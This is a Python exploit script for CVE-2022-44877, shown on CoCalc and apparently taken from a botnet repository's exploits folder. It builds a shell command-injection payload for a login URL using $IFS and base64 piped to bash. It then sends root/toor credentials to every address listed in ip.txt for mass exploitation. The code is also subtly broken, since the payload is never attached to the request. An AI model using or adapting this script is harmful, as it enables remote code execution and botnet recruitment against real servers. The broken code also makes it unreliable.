CoCalc -- CVE-2022-44877.py

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/CVE-2022-44877.py
⁵⁰³⁸ views

1
import vthread
2
import requests
3
import base64
4
import os
5

6
command = b"hi"
7

8
payload = "/login/index.php?login=$(echo${IFS}cmdd${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)".replace(
9
  "cmdd",
10
  base64.b64encode(command).decode())
11

12
data = {"username": "root", "password": "toor", "commit": "Login"}
13
header = {
14
  "Content-Type": "application/x-www-form-urlencoded",
15
  "User-Agent":
16
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
17
  "Accept":
18
  "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
19
  "Accept-Encoding": "gzip, deflate",
20
  "Accept-Language": "en"
21
}
22

23

24

25
def exp(url):
26
  if "http" not in url:
27
    url = "http://" + url
28

29
  try:
30
    r = requests.post(url, verify=False, data=data, header=header)
31
    if r.status_code == 200:
32
      print("[+] payload sent")
33
    else:
34
      print("[-] payload sent fail")
35
  except:
36
    print("[-] connection refused")
37

38
if __name__ == "__main__":
39
  file = open("ip.txt").readlines()
40
  for ip in file:
41
    ip = ip.strip()
42
    exp(ip)
43

Product

Resources

Company